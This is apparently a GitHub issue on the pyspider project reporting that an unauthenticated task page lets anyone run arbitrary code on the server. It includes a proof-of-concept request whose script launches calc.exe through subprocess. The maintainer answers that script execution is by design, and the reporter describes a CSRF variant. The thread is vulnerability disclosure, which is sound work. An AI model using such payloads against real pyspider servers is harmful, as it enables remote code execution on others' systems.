Script content needs security check which could cause RCE

lvf233 commented 3 years ago

🐛 Bug Report

To Reproduce

start up a pyspider-server.
access the task webpage.
upload a task with malicious script.
bingo!

Expected behavior

the server will execute code what you set(it run with a calc.exe that i set to prove this vuln).

Test script or set of commands reproducing this issue

post this task as follow to server.

data = {
'webdav_mode': 'false',
'script':  '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess

def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####  
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}

Environment

pyspider v0.3.10 system ubuntu 18.04 & windows 10 version1909

binux commented 3 years ago

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

lvf233 commented 3 years ago

Yes, script running is the fundamental of this project. There's a warning on readme that you can setup auth to the task page.

yeah , most people still start pyspider with the default configuration, could force the modification of this default setting ? meanwhile, we also designed such a scene, which is opened in the case of only allowing localhost to access, while supporting JavaScript (using other components for rendering). We use the CSRF method to request the local pyspider to achieve the same effect.

binux / pyspider